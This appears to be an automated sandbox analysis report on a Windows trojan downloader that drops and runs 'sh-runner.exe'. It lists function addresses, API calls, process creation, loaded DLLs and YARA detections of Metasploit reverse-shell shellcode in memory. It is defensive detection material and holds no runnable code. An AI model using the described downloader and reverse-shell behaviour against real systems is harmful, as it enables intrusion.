Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_000001FF24FA4310 NtAddBootEntry,	2_2_000001FF24FA4310
Source: C:\ProgramData\sh-runner.exe	Code function: 4_3_00000112CF690020 NtAllocateVirtualMemory,NtProtectVirtualMemory,	4_3_00000112CF690020
Source: C:\ProgramData\sh-runner.exe	Code function: 4_2_00000112CF6C39E0 NtAddBootEntry,	4_2_00000112CF6C39E0
Source: C:\ProgramData\sh-runner.exe	Code function: 4_2_00000112CF6C4050 NtAddBootEntry,	4_2_00000112CF6C4050
Source: C:\ProgramData\sh-runner.exe	Code function: 4_2_00000112CF6C3830 NtAddBootEntry,	4_2_00000112CF6C3830
Source: C:\ProgramData\sh-runner.exe	Code function: 4_2_00000112CF6C48A0 NtAddBootEntry,	4_2_00000112CF6C48A0
Source: C:\ProgramData\sh-runner.exe	Code function: 4_2_00000112CF6C4310 NtAddBootEntry,	4_2_00000112CF6C4310
Source: C:\ProgramData\sh-runner.exe	Code function: 4_2_00000112CF6C36F0 NtAddBootEntry,	4_2_00000112CF6C36F0
Source: C:\ProgramData\sh-runner.exe	Code function: 4_2_00000112CF6C3EF0 NtAddBootEntry,	4_2_00000112CF6C3EF0
Source: C:\ProgramData\sh-runner.exe	Code function: 9_3_00000184BE540020 NtAllocateVirtualMemory,NtProtectVirtualMemory,	9_3_00000184BE540020
Source: C:\ProgramData\sh-runner.exe	Code function: 9_2_00000184BE574310 NtAddBootEntry,	9_2_00000184BE574310
Source: C:\ProgramData\sh-runner.exe	Code function: 9_2_00000184BE574050 NtAddBootEntry,	9_2_00000184BE574050
Source: C:\ProgramData\sh-runner.exe	Code function: 9_2_00000184BE573830 NtAddBootEntry,	9_2_00000184BE573830
Source: C:\ProgramData\sh-runner.exe	Code function: 9_2_00000184BE5748A0 NtAddBootEntry,	9_2_00000184BE5748A0
Source: C:\ProgramData\sh-runner.exe	Code function: 9_2_00000184BE5739E0 NtAddBootEntry,	9_2_00000184BE5739E0
Source: C:\ProgramData\sh-runner.exe	Code function: 9_2_00000184BE5736F0 NtAddBootEntry,	9_2_00000184BE5736F0
Source: C:\ProgramData\sh-runner.exe	Code function: 9_2_00000184BE573EF0 NtAddBootEntry,	9_2_00000184BE573EF0

Source: C:\ProgramData\sh-runner.exe

Code function: 2_2_00007FF72BD12EB0: memcpy,DeviceIoControl,CloseHandle,CloseHandle,GetLastError,

2_2_00007FF72BD12EB0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Code function: 0_2_00007FF71C8C52E0	0_2_00007FF71C8C52E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Code function: 0_2_00007FF71C8C40E0	0_2_00007FF71C8C40E0
Source: C:\ProgramData\sh-runner.exe	Code function: 2_3_000001FF24F7A71A	2_3_000001FF24F7A71A
Source: C:\ProgramData\sh-runner.exe	Code function: 2_3_000001FF24F8764F	2_3_000001FF24F8764F
Source: C:\ProgramData\sh-runner.exe	Code function: 2_3_000001FF24F70BDF	2_3_000001FF24F70BDF
Source: C:\ProgramData\sh-runner.exe	Code function: 2_3_000001FF24F7876F	2_3_000001FF24F7876F
Source: C:\ProgramData\sh-runner.exe	Code function: 2_3_000001FF24F8890B	2_3_000001FF24F8890B
Source: C:\ProgramData\sh-runner.exe	Code function: 2_3_000001FF24F858AF	2_3_000001FF24F858AF
Source: C:\ProgramData\sh-runner.exe	Code function: 2_3_000001FF24F7C13F	2_3_000001FF24F7C13F
Source: C:\ProgramData\sh-runner.exe	Code function: 2_3_000001FF24F88937	2_3_000001FF24F88937
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD2ED08	2_2_00007FF72BD2ED08
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD04C60	2_2_00007FF72BD04C60
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BCD8C90	2_2_00007FF72BCD8C90
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD34C22	2_2_00007FF72BD34C22
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD0AC00	2_2_00007FF72BD0AC00
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BCE8B60	2_2_00007FF72BCE8B60
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BCE0AE0	2_2_00007FF72BCE0AE0
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD68B10	2_2_00007FF72BD68B10
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD56AE0	2_2_00007FF72BD56AE0
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD04B00	2_2_00007FF72BD04B00
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD36AC5	2_2_00007FF72BD36AC5
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD50A60	2_2_00007FF72BD50A60
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD5AA00	2_2_00007FF72BD5AA00
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD5E990	2_2_00007FF72BD5E990
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD0D0B0	2_2_00007FF72BD0D0B0
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD46FD0	2_2_00007FF72BD46FD0
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD54FA0	2_2_00007FF72BD54FA0
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BCF2F70	2_2_00007FF72BCF2F70
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BCD2EF4	2_2_00007FF72BCD2EF4
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD66EC0	2_2_00007FF72BD66EC0
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD48E90	2_2_00007FF72BD48E90
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BCEEE80	2_2_00007FF72BCEEE80
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD34DCD	2_2_00007FF72BD34DCD
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD1CDB0	2_2_00007FF72BD1CDB0
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BCD6D40	2_2_00007FF72BCD6D40
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BCD24C0	2_2_00007FF72BCD24C0
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD4C3A0	2_2_00007FF72BD4C3A0
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD3831A	2_2_00007FF72BD3831A
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD162C0	2_2_00007FF72BD162C0
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD3A201	2_2_00007FF72BD3A201
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD44880	2_2_00007FF72BD44880
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD4E890	2_2_00007FF72BD4E890
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD64840	2_2_00007FF72BD64840
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD40770	2_2_00007FF72BD40770
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD4A720	2_2_00007FF72BD4A720
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD5C6B0	2_2_00007FF72BD5C6B0
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD4C640	2_2_00007FF72BD4C640
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD20610	2_2_00007FF72BD20610
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD605F0	2_2_00007FF72BD605F0
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BCDA5A0	2_2_00007FF72BCDA5A0
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BCD85A0	2_2_00007FF72BCD85A0
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BCD25C0	2_2_00007FF72BCD25C0
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BCE8560	2_2_00007FF72BCE8560
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD17CAE	2_2_00007FF72BD17CAE
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BCF7C90	2_2_00007FF72BCF7C90
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BCDDB40	2_2_00007FF72BCDDB40
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD23B30	2_2_00007FF72BD23B30
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BCD9AD0	2_2_00007FF72BCD9AD0
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD2FA6A	2_2_00007FF72BD2FA6A
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD0FA40	2_2_00007FF72BD0FA40
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD63A20	2_2_00007FF72BD63A20
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BCDBA10	2_2_00007FF72BCDBA10
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD619E0	2_2_00007FF72BD619E0
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD4B9F0	2_2_00007FF72BD4B9F0
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BCFF9B0	2_2_00007FF72BCFF9B0
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BCFD9D0	2_2_00007FF72BCFD9D0
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD499A0	2_2_00007FF72BD499A0
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD3993A	2_2_00007FF72BD3993A
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BCEE0E0	2_2_00007FF72BCEE0E0
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD300F0	2_2_00007FF72BD300F0
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD68080	2_2_00007FF72BD68080
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD65FF0	2_2_00007FF72BD65FF0
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD47F5A	2_2_00007FF72BD47F5A
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD47F58	2_2_00007FF72BD47F58
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD13F70	2_2_00007FF72BD13F70
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD2BF20	2_2_00007FF72BD2BF20
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD5DED0	2_2_00007FF72BD5DED0
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD49E1B	2_2_00007FF72BD49E1B
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BCD7E10	2_2_00007FF72BCD7E10
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD2DDE0	2_2_00007FF72BD2DDE0
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD61DE0	2_2_00007FF72BD61DE0
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD5FDD0	2_2_00007FF72BD5FDD0
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD4BDD0	2_2_00007FF72BD4BDD0
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BCEB440	2_2_00007FF72BCEB440
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BCD93E0	2_2_00007FF72BCD93E0
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD5B410	2_2_00007FF72BD5B410
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD3F340	2_2_00007FF72BD3F340
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD2B340	2_2_00007FF72BD2B340
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BCF1323	2_2_00007FF72BCF1323
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD4F180	2_2_00007FF72BD4F180
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BCF1150	2_2_00007FF72BCF1150
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BCF18FA	2_2_00007FF72BCF18FA
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD5D840	2_2_00007FF72BD5D840
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD39754	2_2_00007FF72BD39754
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BCD76E0	2_2_00007FF72BCD76E0
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BCF16AE	2_2_00007FF72BCF16AE
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD296D0	2_2_00007FF72BD296D0
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD3569B	2_2_00007FF72BD3569B
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD11640	2_2_00007FF72BD11640
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD4B650	2_2_00007FF72BD4B650
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD69650	2_2_00007FF72BD69650
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD49594	2_2_00007FF72BD49594
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_00007FF72BD67590	2_2_00007FF72BD67590
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_000001FF24F9B740	2_2_000001FF24F9B740
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_000001FF24F97D70	2_2_000001FF24F97D70
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_000001FF24FA4EB0	2_2_000001FF24FA4EB0
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_000001FF24F901E0	2_2_000001FF24F901E0
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_000001FF24F99D1B	2_2_000001FF24F99D1B
Source: C:\ProgramData\sh-runner.exe	Code function: 2_2_000001FF24FA6C50	2_2_000001FF24FA6C50
Source: C:\ProgramData\sh-runner.exe	Code function: 4_3_00000112CF6A764F	4_3_00000112CF6A764F
Source: C:\ProgramData\sh-runner.exe	Code function: 4_3_00000112CF69C13F	4_3_00000112CF69C13F
Source: C:\ProgramData\sh-runner.exe	Code function: 4_3_00000112CF6A8937	4_3_00000112CF6A8937
Source: C:\ProgramData\sh-runner.exe	Code function: 4_3_00000112CF6A890B	4_3_00000112CF6A890B
Source: C:\ProgramData\sh-runner.exe	Code function: 4_3_00000112CF690BDF	4_3_00000112CF690BDF
Source: C:\ProgramData\sh-runner.exe	Code function: 4_3_00000112CF6A58AF	4_3_00000112CF6A58AF
Source: C:\ProgramData\sh-runner.exe	Code function: 4_3_00000112CF69A71A	4_3_00000112CF69A71A
Source: C:\ProgramData\sh-runner.exe	Code function: 4_3_00000112CF69876F	4_3_00000112CF69876F
Source: C:\ProgramData\sh-runner.exe	Code function: 4_2_00000112CF6B7D70	4_2_00000112CF6B7D70
Source: C:\ProgramData\sh-runner.exe	Code function: 4_2_00000112CF6BB740	4_2_00000112CF6BB740
Source: C:\ProgramData\sh-runner.exe	Code function: 4_2_00000112CF6B01E0	4_2_00000112CF6B01E0
Source: C:\ProgramData\sh-runner.exe	Code function: 4_2_00000112CF6C4EB0	4_2_00000112CF6C4EB0
Source: C:\ProgramData\sh-runner.exe	Code function: 4_2_00000112CF6B9D1B	4_2_00000112CF6B9D1B
Source: C:\ProgramData\sh-runner.exe	Code function: 4_2_00000112CF6C6C50	4_2_00000112CF6C6C50
Source: C:\ProgramData\sh-runner.exe	Code function: 9_3_00000184BE54876F	9_3_00000184BE54876F
Source: C:\ProgramData\sh-runner.exe	Code function: 9_3_00000184BE54A71A	9_3_00000184BE54A71A
Source: C:\ProgramData\sh-runner.exe	Code function: 9_3_00000184BE540BDF	9_3_00000184BE540BDF
Source: C:\ProgramData\sh-runner.exe	Code function: 9_3_00000184BE5558AF	9_3_00000184BE5558AF
Source: C:\ProgramData\sh-runner.exe	Code function: 9_3_00000184BE55890B	9_3_00000184BE55890B
Source: C:\ProgramData\sh-runner.exe	Code function: 9_3_00000184BE558937	9_3_00000184BE558937
Source: C:\ProgramData\sh-runner.exe	Code function: 9_3_00000184BE54C13F	9_3_00000184BE54C13F
Source: C:\ProgramData\sh-runner.exe	Code function: 9_3_00000184BE55764F	9_3_00000184BE55764F
Source: C:\ProgramData\sh-runner.exe	Code function: 9_2_00000184BE56B740	9_2_00000184BE56B740
Source: C:\ProgramData\sh-runner.exe	Code function: 9_2_00000184BE567D70	9_2_00000184BE567D70
Source: C:\ProgramData\sh-runner.exe	Code function: 9_2_00000184BE576C50	9_2_00000184BE576C50
Source: C:\ProgramData\sh-runner.exe	Code function: 9_2_00000184BE569D1B	9_2_00000184BE569D1B
Source: C:\ProgramData\sh-runner.exe	Code function: 9_2_00000184BE5601E0	9_2_00000184BE5601E0
Source: C:\ProgramData\sh-runner.exe	Code function: 9_2_00000184BE574EB0	9_2_00000184BE574EB0

Source: C:\ProgramData\sh-runner.exe	Code function: String function: 00007FF72BD53A40 appears 124 times
Source: C:\ProgramData\sh-runner.exe	Code function: String function: 00007FF72BD53C98 appears 42 times
Source: C:\ProgramData\sh-runner.exe	Code function: String function: 00007FF72BD597B0 appears 64 times
Source: C:\ProgramData\sh-runner.exe	Code function: String function: 00007FF72BD6AA38 appears 77 times

Source: SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe

Static PE information: Number of sections : 19 > 10

Source: 00000009.00000002.3055111517.00000184BE2A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_0f5a852d os = windows, severity = x86, description = Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., creation_date = 2021-04-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 97daac4249e85a73d4e6a4450248e59e0d286d5e7c230cf32a38608f8333f00d, id = 0f5a852d-cacd-43d7-8754-204b09afba2f, last_modified = 2021-08-23
Source: 00000009.00000002.3055111517.00000184BE2A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 00000002.00000002.3055198846.000001FF22F90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_0f5a852d os = windows, severity = x86, description = Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., creation_date = 2021-04-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 97daac4249e85a73d4e6a4450248e59e0d286d5e7c230cf32a38608f8333f00d, id = 0f5a852d-cacd-43d7-8754-204b09afba2f, last_modified = 2021-08-23
Source: 00000002.00000002.3055198846.000001FF22F90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 00000004.00000002.3055112919.00000112CF4C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_0f5a852d os = windows, severity = x86, description = Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., creation_date = 2021-04-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 97daac4249e85a73d4e6a4450248e59e0d286d5e7c230cf32a38608f8333f00d, id = 0f5a852d-cacd-43d7-8754-204b09afba2f, last_modified = 2021-08-23
Source: 00000004.00000002.3055112919.00000112CF4C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23

Source: classification engine

Classification label: mal96.troj.evad.winEXE@9/5@0/1

Source: C:\ProgramData\sh-runner.exe

Code function: 2_2_00007FF72BD153E0 memset,FormatMessageW,GetLastError,

2_2_00007FF72BD153E0

Source: C:\ProgramData\sh-runner.exe

Code function: 2_2_00007FF72BD23490 CreateToolhelp32Snapshot,memset,Module32FirstW,Module32NextW,UnmapViewOfFile,CloseHandle,UnmapViewOfFile,CloseHandle,CloseHandle,

2_2_00007FF72BD23490

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\sh-runner[1].exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3492:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2720:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6900:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7148:120:WilError_03

Source: SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe

ReversingLabs: Detection: 39%

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Process created: C:\ProgramData\sh-runner.exe "C:\ProgramData\sh-runner.exe"
Source: C:\ProgramData\sh-runner.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\ProgramData\sh-runner.exe "C:\ProgramData\sh-runner.exe"
Source: C:\ProgramData\sh-runner.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\ProgramData\sh-runner.exe "C:\ProgramData\sh-runner.exe"
Source: C:\ProgramData\sh-runner.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Process created: C:\ProgramData\sh-runner.exe "C:\ProgramData\sh-runner.exe"	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Section loaded: slc.dll	Jump to behavior
